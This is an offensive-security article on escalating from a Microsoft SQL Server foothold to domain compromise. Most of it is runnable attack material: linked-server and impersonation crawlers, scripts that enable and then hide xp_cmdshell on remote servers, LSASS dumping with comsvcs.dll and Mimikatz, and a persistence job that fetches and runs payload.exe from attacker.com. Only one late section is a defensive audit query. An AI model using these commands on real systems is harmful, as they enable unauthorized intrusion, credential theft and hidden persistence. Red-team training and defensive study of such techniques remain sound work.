The Hidden Key: How MSSQL Servers Are the New Battleground for Domain Compromise

Introduction:

In the labyrinth of internal corporate networks, Microsoft SQL Server instances are often the overlooked treasure trove for attackers. A single misconfiguration can serve as the initial foothold, leading to a cascade of privileges and ultimately, full domain compromise. This article delves into the advanced techniques and tools red teams use to exploit these database systems, transforming them from data repositories into powerful offensive launchpads.

Learning Objectives:

  • Understand the common privilege escalation paths from a compromised MSSQL service account to Domain Administrator.
  • Learn to utilize cutting-edge tools for automated MSSQL reconnaissance, enumeration, and exploitation.
  • Master the commands for lateral movement and persistence through MSSQL server links and stored procedures.

You Should Know:

1. The Initial Foothold: Service Account Compromise

MSSQL servers often run under domain service accounts. Gaining access to these credentials is frequently the first step.

Command (PowerShell):

Get-WmiObject -Class Win32_Service -ComputerName TARGET_SQL_SERVER |
    Where-Object { $_.Name -like "*sql*" } |
    Select-Object Name, StartName, State

Step-by-Step Guide:

This WMI query remotely enumerates services on the target server and keeps those with "sql" anywhere in the name; the wildcards in `-like "*sql*"` matter, because `-like "sql"` only matches a service literally named sql and returns nothing. The call needs local administrator rights on the target over DCOM/RPC; on current hosts `Get-CimInstance -ClassName Win32_Service` does the same job over WinRM. The `StartName` property reveals the account the service runs under. A default install uses a virtual account (NT Service\MSSQLSERVER) or a managed service account, which gives you little to work with; a domain user account (e.g., DOMAIN\sqlservice) is the interesting case, since it normally has an MSSQLSvc/<host>:<port> SPN registered and is therefore Kerberoastable, and its password is frequently reused across instances and as the stored login on linked servers.

2. Automated MSSQL Reconnaissance with SQLRecon

SQLRecon (https://github.com/skahwah/SQLRecon, by Sanjiv Kawa) is a C#/.NET assembly, not a Go program: you build the solution or download a release and run SQLRecon.exe from a Windows host or through a C2 framework's execute-assembly. It automates the tedious process of enumerating links, impersonation grants and configuration across many instances, and it can pivot through linked servers and impersonated logins from a single command line.

Command (CLI):

 Get the tool (build the solution in Visual Studio or use a release; it is a .NET executable)
git clone https://github.com/skahwah/SQLRecon

 Basic enumeration of a single instance using the current Windows token
SQLRecon.exe /a:WinToken /h:TARGET_SQL_SERVER /m:info
SQLRecon.exe /a:WinToken /h:TARGET_SQL_SERVER /m:whoami
SQLRecon.exe /a:WinToken /h:TARGET_SQL_SERVER /m:links

Step-by-Step Guide:

`/a:` (`/auth:`) selects the authentication mode (WinToken reuses the token of the process you run it from; WinDomain and Local take explicit credentials), `/h:` (`/host:`) is the target instance, and `/m:` (`/module:`) is the action. `info` returns basics such as version, machine name and service account; `whoami` shows the login you land as and whether it is sysadmin; `links` lists the linked servers, which is the input for the next section. The same modules can be pointed at a linked server with `/l:` or run as an impersonated login with `/i:`. Flag names follow the 3.x README; earlier releases used single-dash flags, so check the release you are running. Together this gives you a map of the database environment from a single point of entry.

3. Abusing Server Links for Lateral Movement

A frequent finding in internal assessments is configured linked servers, which let this instance run queries, and with RPC Out enabled whole batches, on other instances. Each link carries its own login mapping: it either passes your Windows identity through or uses a login stored on the link, and that stored login is very often sa or another sysadmin, so the hop lands you with more privilege than you started with.

Command (MSSQL):

-- Enumerate existing linked servers
EXEC sp_linkedservers;

-- Run a query on a linked server (one hop; the inner SELECT is evaluated remotely)
SELECT * FROM OPENQUERY([LINKED_SRV], 'SELECT @@version AS version;');

-- Run a batch on a linked server (needs the "rpc out" option enabled on the link)
EXECUTE ('xp_cmdshell ''whoami''') AT [LINKED_SRV];

Step-by-Step Guide:

`sp_linkedservers` lists the configured links; `sys.servers` returns the same data plus the RPC Out and data-access flags. `OPENQUERY` sends a query string to the linked server and returns its result set; to go more than one hop you nest another OPENQUERY inside the inner query, doubling the single quotes at each level. `EXECUTE ... AT` sends an arbitrary batch instead, which is what you need for xp_cmdshell or sp_configure on the far side, but it only works when the link has the `rpc out` option set (`sp_serveroption`); without it the call fails with error 7411. If xp_cmdshell is enabled on the remote, or the link maps to a sysadmin and you enable it through the same `EXECUTE ... AT`, you have operating system command execution on the other server, effectively moving laterally.
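The enumeration described above, carried through as a script rather than one link at a time. This is an added example, not code from the original article or from SQLRecon: it reads every link from sys.servers, asks the remote side who you are there, and records whether EXECUTE ... AT is possible. Link names are whatever your instance has; nothing is hard-coded.

```sql
-- Added example (not from the original article): walk every linked server one hop
-- out from the current instance and record the context you land in on the far side.
-- Link names are read from sys.servers at run time; nothing is hard-coded.
SET NOCOUNT ON;

CREATE TABLE #link_map (
    link            sysname,
    rpc_out         bit,                   -- 1 = EXECUTE ... AT will work on this link
    remote_server   sysname        NULL,
    remote_login    sysname        NULL,   -- who you are on the far side
    remote_sysadmin int            NULL,   -- 1 = that login is sysadmin there
    error_message   nvarchar(4000) NULL
);

DECLARE @link sysname, @rpcout bit, @sql nvarchar(max),
        @rsrv sysname, @rlogin sysname, @rsa int;

-- sys.servers carries what sp_linkedservers prints plus the RPC Out flag.
DECLARE link_cur CURSOR LOCAL FAST_FORWARD FOR
    SELECT name, is_rpc_out_enabled FROM sys.servers WHERE is_linked = 1;

OPEN link_cur;
FETCH NEXT FROM link_cur INTO @link, @rpcout;
WHILE @@FETCH_STATUS = 0
BEGIN
    -- The inner SELECT is evaluated on the remote as whatever login the link maps
    -- us to, so SYSTEM_USER and IS_SRVROLEMEMBER describe that identity, not ours.
    SET @sql = N'SELECT @srv = remote_server, @lg = remote_login, @sa = remote_sysadmin
                 FROM OPENQUERY(' + QUOTENAME(@link) + N',
                      ''SELECT @@SERVERNAME AS remote_server,
                               SYSTEM_USER  AS remote_login,
                               IS_SRVROLEMEMBER(''''sysadmin'''') AS remote_sysadmin'');';
    BEGIN TRY
        EXEC sp_executesql @sql,
             N'@srv sysname OUTPUT, @lg sysname OUTPUT, @sa int OUTPUT',
             @srv = @rsrv OUTPUT, @lg = @rlogin OUTPUT, @sa = @rsa OUTPUT;
        INSERT INTO #link_map VALUES (@link, @rpcout, @rsrv, @rlogin, @rsa, NULL);
    END TRY
    BEGIN CATCH
        -- A dead link, a failed login mapping or a remote that refuses us should
        -- not stop the crawl; keep the error text and move on.
        INSERT INTO #link_map (link, rpc_out, error_message)
        VALUES (@link, @rpcout, ERROR_MESSAGE());
    END CATCH;
    FETCH NEXT FROM link_cur INTO @link, @rpcout;
END
CLOSE link_cur;
DEALLOCATE link_cur;

-- Links that land you as sysadmin with RPC Out on are the ones worth hopping through.
SELECT * FROM #link_map ORDER BY remote_sysadmin DESC, rpc_out DESC, link;
DROP TABLE #link_map;
```

The result sets from OPENQUERY are pulled into output variables rather than with INSERT ... EXEC, because INSERT ... EXEC wraps the inner call in a transaction and a linked-server call inside it can demand a distributed transaction (MSDTC), which is usually not available. Rows with remote_sysadmin = 1 and rpc_out = 1 are the links where the EXECUTE ... AT batch from the section above will succeed; for a second hop, repeat the crawl on that remote or nest the OPENQUERY with the quotes doubled again.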

4. Privilege Escalation via Impersonation

MSSQL allows users to impersonate other logins if granted the necessary permission, a key privilege escalation vector.

Command (MSSQL):

-- Who may impersonate whom (explicit grants; sysadmin can impersonate anyone without one)
SELECT grantee.name AS grantee,
       target.name  AS can_impersonate,
       p.state_desc
FROM sys.server_permissions p
JOIN sys.server_principals grantee ON grantee.principal_id = p.grantee_principal_id
JOIN sys.server_principals target  ON target.principal_id  = p.major_id
WHERE p.class = 101                     -- 101 = server principal
  AND p.permission_name = 'IMPERSONATE';

-- Impersonate the sa login, confirm the new context, and drop back to your own
EXECUTE AS LOGIN = 'sa';
SELECT SYSTEM_USER, IS_SRVROLEMEMBER('sysadmin');
REVERT;

Step-by-Step Guide:

The first query lists explicit IMPERSONATE grants between logins. `grantee_principal_id` is the login that holds the permission and, for class 101, `major_id` is the login it may impersonate; joining on `grantor_principal_id` instead would tell you who issued the grant, not who can use it. Finding that your login, or a role it belongs to, may impersonate `sa` or any other sysadmin is a major win. `EXECUTE AS LOGIN` then switches the session's security context to that login, and you hold its server-level privileges for everything that follows until `REVERT`. This works even when sa is disabled for logon, so a disabled sa is not a defence against it. The same mechanism exists one level down as `EXECUTE AS USER` inside a database; it becomes a server-level problem when a database is marked TRUSTWORTHY and owned by a sysadmin, because a db_owner there can run code as dbo (for example a procedure created with EXECUTE AS OWNER) that the engine trusts at server level.
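The grant query and the EXECUTE AS test above, combined into one pass that tells you which impersonation targets your current session can actually assume and which of those are sysadmin. This is an added example, not code from the original article; it assumes nothing about the instance beyond the catalog views it reads, and it always ends in the context it started in.

```sql
-- Added example (not from the original article): enumerate the IMPERSONATE grants
-- on this instance and, for each target login, test whether the current session can
-- actually assume it and whether that gets sysadmin. Every switch ends with REVERT.
USE master;   -- every login can reach master, so EXECUTE AS LOGIN cannot fail on database access
SET NOCOUNT ON;

CREATE TABLE #impersonation (
    grantee         sysname,
    target_login    sysname,
    target_sysadmin int            NULL,   -- 1 = sysadmin after the switch, NULL = switch failed
    note            nvarchar(4000) NULL
);

DECLARE @grantee sysname, @target sysname, @is_sa int, @sql nvarchar(max);

DECLARE grant_cur CURSOR LOCAL FAST_FORWARD FOR
    SELECT grantee.name, target.name
    FROM sys.server_permissions p
    JOIN sys.server_principals grantee ON grantee.principal_id = p.grantee_principal_id
    JOIN sys.server_principals target  ON target.principal_id  = p.major_id
    WHERE p.class = 101                           -- 101 = server principal
      AND p.permission_name = 'IMPERSONATE'
      AND p.state IN ('G', 'W')                   -- GRANT / GRANT WITH GRANT OPTION
      AND target.type IN ('S', 'U', 'G');         -- SQL login, Windows login, Windows group

OPEN grant_cur;
FETCH NEXT FROM grant_cur INTO @grantee, @target;
WHILE @@FETCH_STATUS = 0
BEGIN
    -- The switch, the check and the REVERT run in one batch so the session is never
    -- left in the impersonated context, whatever happens in between.
    SET @sql = N'EXECUTE AS LOGIN = ' + QUOTENAME(@target, '''')
             + N'; SET @sa = IS_SRVROLEMEMBER(''sysadmin''); REVERT;';
    BEGIN TRY
        EXEC sp_executesql @sql, N'@sa int OUTPUT', @sa = @is_sa OUTPUT;
        INSERT INTO #impersonation VALUES (@grantee, @target, @is_sa, N'switch succeeded');
    END TRY
    BEGIN CATCH
        -- Expected when the grant belongs to another login or the target cannot be impersonated
        INSERT INTO #impersonation VALUES (@grantee, @target, NULL, ERROR_MESSAGE());
    END CATCH;
    FETCH NEXT FROM grant_cur INTO @grantee, @target;
END
CLOSE grant_cur;
DEALLOCATE grant_cur;

-- Targets that succeeded with target_sysadmin = 1 are your escalation path.
SELECT * FROM #impersonation ORDER BY target_sysadmin DESC, target_login;
DROP TABLE #impersonation;
```

Grants held by other logins show up with the error text in `note`, which is still useful: they tell you which login you would need to become first. If you are already sysadmin the script reports every target as a success, because sysadmin needs no explicit IMPERSONATE grant.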

5. Command Execution with xp_cmdshell

The ultimate goal is often to break out of the SQL context and execute commands on the underlying OS.

Command (MSSQL):

-- First, check whether xp_cmdshell is enabled (value_in_use is what the engine currently honours)
SELECT name, value, value_in_use FROM sys.configurations WHERE name = 'xp_cmdshell';

-- If disabled (value_in_use = 0), enable it (needs ALTER SETTINGS, i.e. sysadmin or serveradmin)
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

-- Execute a system command (each line of output comes back as a row)
EXEC master..xp_cmdshell 'whoami';

Step-by-Step Guide:

This first reads the configuration row: `value` is the pending setting and `value_in_use` the active one. `xp_cmdshell` is an advanced option, so `show advanced options` must be on before `sp_configure` will accept it, and each change needs a `RECONFIGURE` to take effect. Both changes are server-wide and persistent: they show up in any later look at sys.configurations and are written to the SQL Server error log and default trace as "Configuration option 'xp_cmdshell' changed from 0 to 1" (message 15457), so set it back when you are done. Enabling requires the ALTER SETTINGS permission, which sysadmin and serveradmin hold. Once on, a sysadmin caller's commands run as the SQL Server service account; non-sysadmin callers run under the xp_cmdshell proxy account if one is configured and are refused otherwise. Output is returned one row per line, so you can INSERT ... EXEC it into a table and query it, and you effectively have a command prompt on the database server.
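The same enable, use and restore cycle, run against a linked server rather than the local instance, which is the form you actually need after section 3. This is an added example, not code from the original article; the link name [LINKED_SRV] is a placeholder, and the script assumes that link maps to a sysadmin login on the far side and has RPC Out enabled.

```sql
-- Added example (not from the original article): check, enable if needed, use and
-- then restore xp_cmdshell on a linked server from the instance you already hold.
-- Assumes the link [LINKED_SRV] (placeholder name) maps to a sysadmin login on the
-- far side and has RPC Out enabled; otherwise the EXEC ... AT calls fail.
SET NOCOUNT ON;
DECLARE @xp int, @adv int;

-- 1. Read both settings remotely in one round trip. The inner SELECT is evaluated on
--    the far side; value_in_use is what that engine currently honours.
SELECT @xp  = MAX(CASE WHEN name = 'xp_cmdshell'           THEN v END),
       @adv = MAX(CASE WHEN name = 'show advanced options' THEN v END)
FROM OPENQUERY([LINKED_SRV],
     'SELECT name, CAST(value_in_use AS int) AS v
      FROM sys.configurations
      WHERE name IN (''xp_cmdshell'', ''show advanced options'')');

-- 2. Enable only if it is off. Everything inside EXEC(...) AT runs remotely as the
--    login the link maps us to; sp_configure needs ALTER SETTINGS there.
IF @xp = 0
    EXEC ('EXEC sp_configure ''show advanced options'', 1; RECONFIGURE;
           EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT [LINKED_SRV];

-- 3. Run the command; its output rows come back to this session.
EXEC ('EXEC master..xp_cmdshell ''whoami'';') AT [LINKED_SRV];

-- 4. Put the configuration back exactly as found, so sys.configurations on the
--    remote does not advertise the visit (the change itself is still in its error log).
IF @xp = 0
    EXEC ('EXEC sp_configure ''xp_cmdshell'', 0; RECONFIGURE;') AT [LINKED_SRV];
IF @xp = 0 AND @adv = 0
    EXEC ('EXEC sp_configure ''show advanced options'', 0; RECONFIGURE;') AT [LINKED_SRV];
```

If step 2 fails with a permissions error, the link's stored login is not sysadmin on the remote and you are limited to what OPENQUERY will return; if it fails with error 7411, the link lacks RPC Out and `EXECUTE ... AT` is not available at all on that path.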

6. Stealing Credentials via Process Memory

Once you have OS command execution, the credentials worth stealing sit in the LSASS process, not in sqlservr.exe: Mimikatz parses LSASS dumps, and the SQL Server process itself does not hold Windows passwords. Reading LSASS needs SeDebugPrivilege, which the service account only has when it is a local administrator on the host. That is a common misconfiguration but not the default, so check before you try. The practical route is to use a signed, built-in binary (rundll32 with the MiniDump export of comsvcs.dll, for example) from xp_cmdshell to write a minidump, copy it off, and parse it offline with Mimikatz (`sekurlsa::minidump`, then `sekurlsa::logonpasswords`). Expect this to be the noisiest thing you do on the host: every EDR watches handle opens to LSASS. A quieter, SQL-specific alternative is the stored passwords of the instance's own linked-server logins, which a sysadmin who is also local admin on the host can decrypt with the service master key over the Dedicated Admin Connection; those are frequently the sa password of the next hop.

Step-by-Step Guide:

Confirm the service account from sys.dm_server_services (or the WMI query in section 1), then run `whoami /priv` through xp_cmdshell and look for SeDebugPrivilege. If it is present, dump LSASS to a path the service account can write, such as C:\Windows\Temp, and retrieve the file for offline analysis. If it is absent, the account is not an administrator: pursue the link and impersonation paths instead rather than burning the session on a dump that will fail and alert.

7. Persistence via SQL Server Agent Jobs

To maintain access, attackers can schedule tasks to run regularly using the SQL Server Agent.

Command (MSSQL):

-- Create a new job that runs a system command
USE msdb;
EXEC dbo.sp_add_job @job_name = 'SystemMaintenance', @enabled = 1;
EXEC dbo.sp_add_jobstep
    @job_name  = 'SystemMaintenance',
    @step_name = 'RunSync',
    @subsystem = 'CMDEXEC',
    @command   = 'cmd /c "curl http://attacker.com/payload.exe -o C:\temp\payload.exe && C:\temp\payload.exe"';
EXEC dbo.sp_add_jobschedule
    @job_name          = 'SystemMaintenance',
    @name              = 'Nightly',
    @freq_type         = 4,        -- daily
    @freq_interval     = 1,        -- every 1 day
    @active_start_time = 010000;   -- 01:00:00, HHMMSS as an integer
EXEC dbo.sp_add_jobserver @job_name = 'SystemMaintenance';   -- no @server_name = the local instance

Step-by-Step Guide:

This creates a job named "SystemMaintenance" with one step in the `CMDEXEC` subsystem that downloads and runs a payload; `curl` is present on Windows Server 2019 and later, and C:\temp must exist or the step fails silently. The schedule (`@freq_type = 4` is daily, `@freq_interval = 1` means every day, `@active_start_time = 010000` is 01:00:00 in HHMMSS) fires it nightly, and `sp_start_job 'SystemMaintenance'` runs it immediately if you do not want to wait. Creating a CMDEXEC step without a proxy account requires sysadmin, and the step runs as the SQL Server Agent service account, which is often a domain account with more reach than the engine's. The Agent service has to be running for any of this to fire; sys.dm_server_services shows its state. `sp_add_jobschedule` still works but is deprecated in favour of `sp_add_schedule` followed by `sp_attach_schedule`. The job looks like routine maintenance in the Agent's job list, but the command text sits in clear in msdb.dbo.sysjobsteps, so anyone who reviews job steps, or alerts on newly created CMDEXEC or PowerShell steps, will find it.
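Every technique in sections 3 to 7 depends on a catalog entry that a defender can read just as easily as an attacker can. The following is an added example, not code from the original article: one read-only pass over those views on a single instance, so a DBA or blue team sees the link mappings, impersonation grants, OS-execution switches and Agent steps that the attack chain above relies on. It assumes only VIEW ANY DEFINITION, VIEW SERVER STATE and SELECT on the msdb job tables.

```sql
-- Added example (not from the original article): one pass over the catalog views
-- that the techniques in this article depend on, so defenders see what an attacker
-- would enumerate first. Read-only; needs VIEW ANY DEFINITION / VIEW SERVER STATE
-- on the instance and SELECT on the msdb job tables.
USE master;
SET NOCOUNT ON;

-- 1. OS-execution features: 1 = enabled. xp_cmdshell is the obvious one; the
--    others are alternative routes to code execution from T-SQL.
SELECT name, CAST(value_in_use AS int) AS enabled
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures', 'clr enabled', 'Ad Hoc Distributed Queries');

-- 2. Linked servers with their login mapping. A remote_name of sa (or any sysadmin)
--    combined with rpc out = 1 is a one-statement hop to command execution there.
SELECT s.name AS link,
       s.data_source,
       s.is_rpc_out_enabled,
       s.is_data_access_enabled,
       p.name AS local_login,            -- NULL = the default mapping for all logins
       ll.uses_self_credential,          -- 1 = pass the caller's Windows identity through
       ll.remote_name                    -- stored remote login (password kept encrypted in master)
FROM sys.servers s
LEFT JOIN sys.linked_logins ll ON ll.server_id = s.server_id
LEFT JOIN sys.server_principals p ON p.principal_id = ll.local_principal_id
WHERE s.is_linked = 1;

-- 3. Explicit IMPERSONATE grants between server principals (sysadmin needs none).
SELECT grantee.name AS grantee, target.name AS can_impersonate, p.state_desc
FROM sys.server_permissions p
JOIN sys.server_principals grantee ON grantee.principal_id = p.grantee_principal_id
JOIN sys.server_principals target  ON target.principal_id  = p.major_id
WHERE p.class = 101 AND p.permission_name = 'IMPERSONATE';

-- 4. Agent job steps that leave the SQL context, with owner and last change. A step
--    with no proxy_id runs as the Agent service account itself.
SELECT j.name AS job, j.enabled, SUSER_SNAME(j.owner_sid) AS owner,
       s.step_name, s.subsystem, s.proxy_id, s.command, j.date_modified
FROM msdb.dbo.sysjobs j
JOIN msdb.dbo.sysjobsteps s ON s.job_id = j.job_id
WHERE s.subsystem IN ('CmdExec', 'PowerShell')
ORDER BY j.date_modified DESC;

-- 5. Is sa still enabled for logon? Disabling it does not stop EXECUTE AS LOGIN = 'sa',
--    but an enabled sa is also a password-guessing target.
SELECT name, is_disabled FROM sys.server_principals WHERE sid = 0x01;

-- 6. What the engine and Agent run as; a domain account here is both a Kerberoast
--    target and the identity any xp_cmdshell or Agent step will execute under.
SELECT servicename, service_account, status_desc FROM sys.dm_server_services;
```

Run it per instance and diff the output over time: a new row in query 4, a link whose remote_name turned into sa, or xp_cmdshell flipping to 1 in query 1 each correspond directly to one of the steps described above.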

What Undercode Say:

  • The Path to DA is Paved with SQL Links: A single vulnerable MSSQL server is rarely the end goal. Its true value lies in its connections—linked servers, service accounts, and trusted relationships—that can be weaponized to hop across the network until domain administrator privileges are achieved.
  • Automation is Key to Depth: Manual enumeration of complex SQL environments is impractical. The shift towards tools like SQLRecon represents the modern offensive mindset: automated, comprehensive, and designed to quickly map and exploit trust relationships across entire estates, including cloud-integrated systems like Entra ID.

The professional consensus is clear: MSSQL is a critical attack surface that is chronically under-secured. Its deep integration with Windows authentication and common misconfigurations around linked servers and command execution make it a prime target. The maturity of offensive tooling has drastically reduced the time from initial compromise to domain escalation, turning database administrators into first-line defenders.

Prediction:

The convergence of hybrid cloud environments (like Entra ID/Azure SQL integration) will expand the attack surface, making SQL-based enumeration tools indispensable for both red and blue teams. We predict a rise in fileless attacks that abuse legitimate SQL procedures for entire attack chains, from recon to data exfiltration, making detection by traditional security tools more difficult. Defense will require a paradigm shift towards stricter adherence to the principle of least privilege for service accounts, pervasive monitoring of SQL server link traffic, and behavioral analysis of stored procedure execution.

Reported By: Vamsi Krishna – Hackers Feeds